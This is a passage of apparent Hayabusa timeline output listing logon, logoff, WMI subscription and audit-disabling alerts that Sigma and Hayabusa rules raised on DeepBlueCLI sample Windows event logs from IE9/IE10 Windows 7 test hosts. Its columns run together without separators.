6662014-11-27 02:38:06.000 +09:00IE9Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
6672014-11-27 02:41:21.932 +09:00IE9Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x13216rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6682014-11-27 02:43:17.671 +09:00IE9Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6692014-11-27 02:43:17.671 +09:00IE9Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6702014-11-27 02:43:31.734 +09:00IE9Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6712014-11-27 02:43:40.000 +09:00IE9Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
6722014-11-27 02:43:56.893 +09:00IE9Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6732014-11-27 02:43:56.893 +09:00IE9Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6742014-11-27 02:43:56.893 +09:00IE9Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6752014-11-27 02:44:39.689 +09:00IE9Win74648informationalExplicit LogonSource User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6762014-11-27 02:44:39.689 +09:00IE9Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36aed : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6772014-11-27 02:44:39.689 +09:00IE9Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36b1d : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6782014-11-27 02:44:39.689 +09:00IE9Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x36aedrules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6792014-11-27 02:46:03.000 +09:00IE9Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
6802014-11-27 02:46:03.000 +09:00IE9Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
6812014-11-27 02:59:00.431 +09:00IE9Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6822014-11-27 02:59:00.431 +09:00IE9Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6832014-11-27 02:59:00.431 +09:00IE9Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6842014-11-27 03:15:07.962 +09:00IE9Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x36b1drules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6852014-11-27 03:15:39.306 +09:00IE9Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6862014-11-27 03:16:49.390 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6872014-11-27 03:16:49.390 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6882014-11-27 03:17:04.250 +09:00IE10Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6892014-11-27 03:17:08.000 +09:00IE10Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
6902014-11-27 03:17:13.369 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6912014-11-27 03:17:13.369 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6922014-11-27 03:17:13.369 +09:00IE10Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6932014-11-27 03:17:19.150 +09:00IE10Win74648informationalExplicit LogonSource User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6942014-11-27 03:17:19.150 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c02 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6952014-11-27 03:17:19.150 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c32 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6962014-11-27 03:17:19.150 +09:00IE10Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x11c02rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6972014-11-27 03:20:34.000 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
6982014-11-27 03:20:34.000 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
6992014-11-27 03:30:25.009 +09:00IE10Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x11c32rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7002014-11-27 08:21:46.785 +09:00IE10Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7012014-11-27 08:21:48.000 +09:00IE10Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7022014-11-27 08:21:50.498 +09:00IE10Win74648informationalExplicit LogonSource User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7032014-11-27 08:21:50.498 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x170f5 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7042014-11-27 08:21:50.498 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x17125 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7052014-11-27 08:21:50.498 +09:00IE10Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x170f5rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7062014-11-27 08:23:59.000 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7072014-11-27 08:23:59.000 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7082014-11-27 08:24:45.552 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7092014-11-27 08:24:45.552 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7102014-11-27 08:25:04.605 +09:00IE10Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x17125rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7112014-11-27 08:25:51.420 +09:00IE10Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7122014-11-27 08:25:54.000 +09:00IE10Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7132014-11-27 08:25:55.414 +09:00IE10Win74648informationalExplicit LogonSource User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7142014-11-27 08:25:55.414 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ac86 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7152014-11-27 08:25:55.414 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b245 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7162014-11-27 08:25:55.414 +09:00IE10Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x1ac86rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7172014-11-27 08:26:40.560 +09:00IE10Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x1b245rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7182014-11-29 00:46:09.645 +09:00IE10Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7192014-11-29 00:46:10.000 +09:00IE10Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7202014-11-29 00:46:12.437 +09:00IE10Win74648informationalExplicit LogonSource User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7212014-11-29 00:46:12.437 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a23a : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7222014-11-29 00:46:12.437 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a265 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7232014-11-29 00:46:12.437 +09:00IE10Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x1a23arules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7242014-11-29 00:48:19.000 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7252014-11-29 00:48:19.000 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7262014-11-29 00:48:19.456 +09:00IE10Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x1a265rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7272016-08-18 23:46:21.297 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7282016-08-18 23:46:21.297 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7292016-08-18 23:46:21.750 +09:00IE10Win74648informationalExplicit LogonSource User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7302016-08-18 23:46:21.750 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e056 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7312016-08-18 23:46:21.750 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e3c9 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7322016-08-18 23:46:21.750 +09:00IE10Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x1e056rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7332016-08-18 23:46:33.911 +09:00IE10Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x1e3c9rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7342016-08-18 23:46:34.426 +09:00IE10Win74634informationalLogoffUser: IEUser : LogonID: 0x1e3c9rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7352016-08-18 23:46:34.426 +09:00IE10Win74634informationalLogoffUser: IEUser : LogonID: 0x1e056rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7362016-08-18 23:47:04.676 +09:00IE10Win74648informationalExplicit LogonSource User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7372016-08-18 23:47:04.676 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6831f : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7382016-08-18 23:47:04.676 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6832b : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7392016-08-18 23:47:04.676 +09:00IE10Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x6831frules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7402016-08-18 23:47:20.053 +09:00IE10Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x6832brules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7412016-08-18 23:47:36.671 +09:00IE10Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7422016-08-18 23:47:37.000 +09:00IE10Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7432016-08-18 23:47:38.102 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7442016-08-18 23:47:38.102 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7452016-08-18 23:47:38.430 +09:00IE10Win74648informationalExplicit LogonSource User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7462016-08-18 23:47:38.430 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1dc1e : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7472016-08-18 23:47:38.430 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ee41 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7482016-08-18 23:47:38.430 +09:00IE10Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x1dc1erules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7492016-08-18 23:48:31.289 +09:00IE10Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x1ee41rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7502016-08-18 23:49:38.281 +09:00IE10Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7512016-08-18 23:49:39.000 +09:00IE10Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7522016-08-18 23:49:39.844 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7532016-08-18 23:49:39.844 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7542016-08-18 23:49:40.000 +09:00IE10Win74648informationalExplicit LogonSource User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7552016-08-18 23:49:40.000 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b293 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7562016-08-18 23:49:40.000 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b2fd : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7572016-08-18 23:49:40.000 +09:00IE10Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x1b293rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7582016-08-18 23:51:41.000 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7592016-08-18 23:51:41.000 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7602016-08-18 23:52:55.692 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7612016-08-18 23:52:55.692 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7622016-08-19 00:28:28.043 +09:00IE10Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x1b2fdrules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7632016-08-19 00:29:27.609 +09:00IE10Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7642016-08-19 00:29:28.000 +09:00IE10Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7652016-08-19 00:29:29.859 +09:00IE10Win74648informationalExplicit LogonSource User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7662016-08-19 00:29:29.859 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1aae1 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7672016-08-19 00:29:29.859 +09:00IE10Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1af2f : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7682016-08-19 00:29:29.859 +09:00IE10Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x1aae1rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7692016-08-19 00:31:31.000 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7702016-08-19 00:31:31.000 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
7712016-08-19 00:43:46.923 +09:00IE10Win74719highDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7722016-08-19 00:43:46.923 +09:00IE10Win74719highDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7732016-08-19 00:43:46.923 +09:00IE10Win74719highDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7742016-08-19 00:43:46.923 +09:00IE10Win74719highDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7752016-08-19 00:43:46.923 +09:00IE10Win74719highDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7762016-08-19 00:43:46.923 +09:00IE10Win74719highDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7772016-08-19 00:43:46.923 +09:00IE10Win74719highDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7782016-08-19 00:43:46.923 +09:00IE10Win74719highDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7792016-08-19 00:43:46.923 +09:00IE10Win74719highDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7802016-08-19 00:43:46.923 +09:00IE10Win74719highDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7812016-08-19 00:43:46.923 +09:00IE10Win74719highDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7822016-08-19 00:43:46.923 +09:00IE10Win74719highDisabling Windows Event Auditingrules/sigma/builtin/security/win_disable_event_logging.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
